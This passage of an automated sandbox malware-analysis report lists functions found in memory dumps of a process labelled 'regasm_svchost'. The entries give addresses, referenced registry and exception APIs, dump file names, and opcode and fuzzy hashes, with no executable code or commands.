                                                                  • Snapshot File: hcaresult_6_2_320000_regasm_svchost.jbxd
                                                                  Similarity
                                                                  • API ID: DispatcherExceptionUser
                                                                  • String ID:
                                                                  • API String ID: 6842923-0
                                                                  • Opcode ID: f94936b67bdaedd60c155a95665552aaa0524dafa95ca95f0858ace8e7157fba
                                                                  • Instruction ID: e6e84263f1a53568571ec83e0c98ff6861fe67138646850d3eb2e0c6f65dd6b6
                                                                  • Opcode Fuzzy Hash: f94936b67bdaedd60c155a95665552aaa0524dafa95ca95f0858ace8e7157fba
                                                                  • Instruction Fuzzy Hash: 25A1C638906328CFCB65DF60D898799B7B1BF49306F2089D9D40AA7750DB316E8ADF41
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Function 00680DF8 Relevance: 1.7, Strings: 1, Instructions: 440COMMON
                                                                  Download Yara Rule
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000006.00000002.1168515016.0000000000680000.00000040.00000800.00020000.00000000.sdmp, Offset: 00680000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_6_2_680000_regasm_svchost.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: |USk
                                                                  • API String ID: 0-556571172
                                                                  • Opcode ID: 757f2df4e1d074ff57d28846a78f23cbdaea251b70d04956db3d3f329aadef49
                                                                  • Instruction ID: ad87f89e9498ea9adb666258d87be71e8e1191c5ffcc94c68527456ffe0929c5
                                                                  • Opcode Fuzzy Hash: 757f2df4e1d074ff57d28846a78f23cbdaea251b70d04956db3d3f329aadef49
                                                                  • Instruction Fuzzy Hash: BEF1C230B043548FDB06EB74D8646AE7BF2AF8A304F14857AE406DB796DB389C49CB51
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Function 003279EB Relevance: 1.7, APIs: 1, Instructions: 186COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • KiUserExceptionDispatcher.NTDLL ref: 00327A0F
                                                                  Memory Dump Source
                                                                  • Source File: 00000006.00000002.1168161154.0000000000320000.00000040.00000800.00020000.00000000.sdmp, Offset: 00320000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_6_2_320000_regasm_svchost.jbxd
                                                                  Similarity
                                                                  • API ID: DispatcherExceptionUser
                                                                  • String ID:
                                                                  • API String ID: 6842923-0
                                                                  • Opcode ID: 7827302277fabf7a7332b5c0b851f6044406fb3d9184599c3b6bdaa9c289b22b
                                                                  • Instruction ID: 23165e0787ae0e9063b1369fa20ecc5bc887a9f7d0b2b6119cb97d7b4b29ae3a
                                                                  • Opcode Fuzzy Hash: 7827302277fabf7a7332b5c0b851f6044406fb3d9184599c3b6bdaa9c289b22b
                                                                  • Instruction Fuzzy Hash: C6A1C538906328CFCB65DF60D898799B7B1BF49306F2089D9D40AA7750DB316E8ADF41
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Function 00771838 Relevance: 1.6, APIs: 1, Instructions: 120registryCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • RegOpenKeyExW.KERNEL32(?,00000000,?,00000001,?), ref: 0077194C
                                                                  Memory Dump Source
                                                                  • Source File: 00000006.00000002.1168623566.0000000000770000.00000040.00000800.00020000.00000000.sdmp, Offset: 00770000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_6_2_770000_regasm_svchost.jbxd
                                                                  Similarity
                                                                  • API ID: Open
                                                                  • String ID:
                                                                  • API String ID: 71445658-0
                                                                  • Opcode ID: 51afb9b40036ad96ad63faa2c5602353b95c29da8ce57e18a0e321629f4ec7f9
                                                                  • Instruction ID: 830bc4328a1bb1f8e9aff448d6231410fe07229cc7f4f1300b3453159d0c0887
                                                                  • Opcode Fuzzy Hash: 51afb9b40036ad96ad63faa2c5602353b95c29da8ce57e18a0e321629f4ec7f9
                                                                  • Instruction Fuzzy Hash: B54156B09043898FDB14CFA8C448B9EBFF5AF49304F29C16AD408AB351C778A845CFA1
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Function 00771B00 Relevance: 1.6, APIs: 1, Instructions: 114registryCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • RegQueryValueExW.KERNEL32(00000000,00000000,?,?,00000000,?), ref: 00771C09
                                                                  Memory Dump Source
                                                                  • Source File: 00000006.00000002.1168623566.0000000000770000.00000040.00000800.00020000.00000000.sdmp, Offset: 00770000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_6_2_770000_regasm_svchost.jbxd
                                                                  Similarity
                                                                  • API ID: QueryValue
                                                                  • String ID:
                                                                  • API String ID: 3660427363-0
                                                                  • Opcode ID: 72a18475b6099cb84ad31e421244f12bcc0b6769009659ec34a8c1b3ee9dbea5
                                                                  • Instruction ID: 8b8bcab74394900e952b9f3bcf96382bb681b7e484ccab866313ba9c9e674356
                                                                  • Opcode Fuzzy Hash: 72a18475b6099cb84ad31e421244f12bcc0b6769009659ec34a8c1b3ee9dbea5
                                                                  • Instruction Fuzzy Hash: 324115B0E00258DFCB11CFA9D884ADEBFF5AF48344F65806AE819AB751D7749905CFA0
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Function 00771B50 Relevance: 1.6, APIs: 1, Instructions: 85registryCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • RegQueryValueExW.KERNEL32(00000000,00000000,?,?,00000000,?), ref: 00771C09
                                                                  Memory Dump Source
                                                                  • Source File: 00000006.00000002.1168623566.0000000000770000.00000040.00000800.00020000.00000000.sdmp, Offset: 00770000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_6_2_770000_regasm_svchost.jbxd
                                                                  Similarity
                                                                  • API ID: QueryValue
                                                                  • String ID:
                                                                  • API String ID: 3660427363-0
                                                                  • Opcode ID: 917bfa53812079e07fd41b6d7ce9da35b250afabdfe29c8b5a41a1a1c8b368b5
                                                                  • Instruction ID: 29ec5bdc798ea5a65088601367827ab6e5181f0077b6b39f5e4f575dacc1eeda
                                                                  • Opcode Fuzzy Hash: 917bfa53812079e07fd41b6d7ce9da35b250afabdfe29c8b5a41a1a1c8b368b5
                                                                  • Instruction Fuzzy Hash: F231DDB1D002589FCB10CF9AC884ADEFFF5AF48744F65842AE818AB310D774A945CFA0
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Function 00771898 Relevance: 1.6, APIs: 1, Instructions: 80registryCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • RegOpenKeyExW.KERNEL32(?,00000000,?,00000001,?), ref: 0077194C
                                                                  Memory Dump Source
                                                                  • Source File: 00000006.00000002.1168623566.0000000000770000.00000040.00000800.00020000.00000000.sdmp, Offset: 00770000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_6_2_770000_regasm_svchost.jbxd
                                                                  Similarity
                                                                  • API ID: Open
                                                                  • String ID:
                                                                  • API String ID: 71445658-0
                                                                  • Opcode ID: 0c47f7e86daae30b5f9037bc6b46c599c344e19d2c749c7a46106cc663fbe40f
                                                                  • Instruction ID: 15d92bb733a8d1673040298172701ff546fc5d4cbbe9feec16e6770c6cbc5804
                                                                  • Opcode Fuzzy Hash: 0c47f7e86daae30b5f9037bc6b46c599c344e19d2c749c7a46106cc663fbe40f
                                                                  • Instruction Fuzzy Hash: 0531D0B0D012899FDB10CF99C584A9EFBF5AF48344F28C56AD808AB341C775A985CFA1
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Function 00680048 Relevance: .3, Instructions: 327COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000006.00000002.1168515016.0000000000680000.00000040.00000800.00020000.00000000.sdmp, Offset: 00680000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_6_2_680000_regasm_svchost.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: f8a03f1cb26c575408222eba90df8d07c2a98f9d2eca278d4d04a2de66386443
                                                                  • Instruction ID: 10fa29f401172edd7268da196bdcdf1ba2bec0e9e0ba78651563071bcb14e4de
                                                                  • Opcode Fuzzy Hash: f8a03f1cb26c575408222eba90df8d07c2a98f9d2eca278d4d04a2de66386443
                                                                  • Instruction Fuzzy Hash: 12B1E330B093858FD712AB74D8642AE7BF2AF86308F1589BAD545CB792DB34DC0E8751
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Function 00680A17 Relevance: .3, Instructions: 301COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000006.00000002.1168515016.0000000000680000.00000040.00000800.00020000.00000000.sdmp, Offset: 00680000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_6_2_680000_regasm_svchost.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 5e94fd602fecbe897284c08541bd3c1d5e0331d9be0343c8d26d397c3a35ce52
                                                                  • Instruction ID: 5ce0e5eff72c41eab9aa5074a6e3bfa9806e78370ee453af1032872c96f9100f
                                                                  • Opcode Fuzzy Hash: 5e94fd602fecbe897284c08541bd3c1d5e0331d9be0343c8d26d397c3a35ce52
                                                                  • Instruction Fuzzy Hash: 30A123307093848FD756AB74D8247AE7BA29F86304F258ABAD045CF396EB35DC09C752
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Function 006806F9 Relevance: .2, Instructions: 225COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000006.00000002.1168515016.0000000000680000.00000040.00000800.00020000.00000000.sdmp, Offset: 00680000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_6_2_680000_regasm_svchost.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: b77df971f8dc1d2d109874a1c1066c711a8d4be9e03a1f530d2628e79c94a683
                                                                  • Instruction ID: 33a5d872b63f8d6b3eff871531b1d61d31195af678ec1fae444ddc94bfdd10a8
                                                                  • Opcode Fuzzy Hash: b77df971f8dc1d2d109874a1c1066c711a8d4be9e03a1f530d2628e79c94a683
                                                                  • Instruction Fuzzy Hash: F37196717101445BFF6867A8E8547AE365BDB89314F20993BE00AC7B95CF68CC8C57A2
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Function 00680708 Relevance: .2, Instructions: 220COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000006.00000002.1168515016.0000000000680000.00000040.00000800.00020000.00000000.sdmp, Offset: 00680000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_6_2_680000_regasm_svchost.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: fdeec8d6d5c1fc233637ee187e262acd1533a79013d5f7e39c81300a90a00a64
                                                                  • Instruction ID: 6b52dca19def816ed3b4d5d1f5239f068d88619d52ed404f4b4ce59bb5792d21
                                                                  • Opcode Fuzzy Hash: fdeec8d6d5c1fc233637ee187e262acd1533a79013d5f7e39c81300a90a00a64
                                                                  • Instruction Fuzzy Hash: 4C6183717101045BFF6867A8E8547AE329BDB89314F20993AE00AC7B95CF68CC8C57E2
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Function 00680006 Relevance: .2, Instructions: 212COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000006.00000002.1168515016.0000000000680000.00000040.00000800.00020000.00000000.sdmp, Offset: 00680000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_6_2_680000_regasm_svchost.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 6f3d85dd01d9186ba20fa1d1683fc184abb0f184f68b1087aad197e82690e998
                                                                  • Instruction ID: 3af439593bbab5c769d47f30c2ab90779a137dfd97d38741be0f92470cfd656f
                                                                  • Opcode Fuzzy Hash: 6f3d85dd01d9186ba20fa1d1683fc184abb0f184f68b1087aad197e82690e998
                                                                  • Instruction Fuzzy Hash: 99711830B043458FD711AB70D8682AD7BF3AF85309F158929D406DBB92EF749D4E8B51
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Function 0015D514 Relevance: .1, Instructions: 75COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000006.00000002.1167994455.000000000015D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0015D000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_6_2_15d000_regasm_svchost.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: d5b5cd8703cfa1ba20a69f4b072012486586ffce574027638c59cd2756c0aa3a
                                                                  • Instruction ID: 9392af1886c54c28178d031a058bc7bf79a422358cf311d5e0d21e67bf4b6942
                                                                  • Opcode Fuzzy Hash: d5b5cd8703cfa1ba20a69f4b072012486586ffce574027638c59cd2756c0aa3a
                                                                  • Instruction Fuzzy Hash: 782103B1604244DFDB25DF14E880B2ABF71FB88319F24C169EC054F646D336D84ACBA2
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Function 0015D160 Relevance: .1, Instructions: 75COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000006.00000002.1167994455.000000000015D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0015D000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_6_2_15d000_regasm_svchost.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: d6a978b653cf06b87733a9f238f3c3289cacefe07fea017143679f31fb059734
                                                                  • Instruction ID: 7728e336107a876e3d2bdc55e55341ffc94fabd3c8d981ea25eece0b5f753ba2
                                                                  • Opcode Fuzzy Hash: d6a978b653cf06b87733a9f238f3c3289cacefe07fea017143679f31fb059734
                                                                  • Instruction Fuzzy Hash: D92134B5644204EFDB25CF10E8C0B26BF61FB98315F24C169EC094F24AC336D84ACBA2
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Function 001AE3F0 Relevance: .1, Instructions: 72COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000006.00000002.1168029634.00000000001AD000.00000040.00000800.00020000.00000000.sdmp, Offset: 001AD000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_6_2_1ad000_regasm_svchost.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 79f0727676e59dbfc55ea3517f1a54a39526ee457b55c9b17371fc3daa448fbb
                                                                  • Instruction ID: 2914afe2338669f75c574accd2d32a97b3f6d952462487442c11407e5c3745c3
                                                                  • Opcode Fuzzy Hash: 79f0727676e59dbfc55ea3517f1a54a39526ee457b55c9b17371fc3daa448fbb
                                                                  • Instruction Fuzzy Hash: CB210779604204EFDB14CF10E884B26BFE9EB89718F24C569D9098B746C336D846CBA1
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Function 0015D50F Relevance: .1, Instructions: 56COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000006.00000002.1167994455.000000000015D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0015D000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_6_2_15d000_regasm_svchost.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 3a05ebc1d9faffc0bee7dfb0de2ddbe100748ab4a0911baaa321d362efd1a1b4
                                                                  • Instruction ID: 5ba0fdfe44b15a5c9ac32b488b12eb24ca94d9c38b37e6630bd1125845f1ceac
                                                                  • Opcode Fuzzy Hash: 3a05ebc1d9faffc0bee7dfb0de2ddbe100748ab4a0911baaa321d362efd1a1b4
                                                                  • Instruction Fuzzy Hash: 07119D76404280DFDB12CF14E584B1ABF71FB84314F24C6A9D8054F656C336D95ACBA2
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Function 0015D15B Relevance: .1, Instructions: 56COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000006.00000002.1167994455.000000000015D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0015D000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_6_2_15d000_regasm_svchost.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 3a05ebc1d9faffc0bee7dfb0de2ddbe100748ab4a0911baaa321d362efd1a1b4
                                                                  • Instruction ID: fecd84a488e4774317da4b3abc683df3b53807102092505c58c4946a57cc1900
                                                                  • Opcode Fuzzy Hash: 3a05ebc1d9faffc0bee7dfb0de2ddbe100748ab4a0911baaa321d362efd1a1b4
                                                                  • Instruction Fuzzy Hash: 5D119D76404240DFCB12CF54E584B16BF61FB94310F24C6A9DC084B656C336D85ACBA2
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Function 001AE3EB Relevance: .1, Instructions: 53COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000006.00000002.1168029634.00000000001AD000.00000040.00000800.00020000.00000000.sdmp, Offset: 001AD000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_6_2_1ad000_regasm_svchost.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 8b76238fb7ed8662660fcdca6eb1e1b63f0cb06879a948e97c6c9b64f4795708
                                                                  • Instruction ID: 47bb3e00b9a8d79c41db977e56074577bf6a781fc58d6f8d06db9d0bd0fcff2f
                                                                  • Opcode Fuzzy Hash: 8b76238fb7ed8662660fcdca6eb1e1b63f0cb06879a948e97c6c9b64f4795708
                                                                  • Instruction Fuzzy Hash: 22119D79504280DFDB11CF14D5C4B15BFA1FB89324F24C6AAD8498B756C33AD85ACB62
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Function 00680D1B Relevance: .0, Instructions: 49COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000006.00000002.1168515016.0000000000680000.00000040.00000800.00020000.00000000.sdmp, Offset: 00680000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_6_2_680000_regasm_svchost.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 68f71eb67eb75025e99dea841b2d9b4adf3a6539e0d9b851f649bfb9134b2d76
                                                                  • Instruction ID: 4b4db067d84bf428b6096f0d96fe5f1672788e2b124de919bf5ee86255bf045d
                                                                  • Opcode Fuzzy Hash: 68f71eb67eb75025e99dea841b2d9b4adf3a6539e0d9b851f649bfb9134b2d76
                                                                  • Instruction Fuzzy Hash: 0E0149316006008FC7517BB4E44027CB3A3AF85255F218D2CD45A9BB90EF31A85D87D2
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%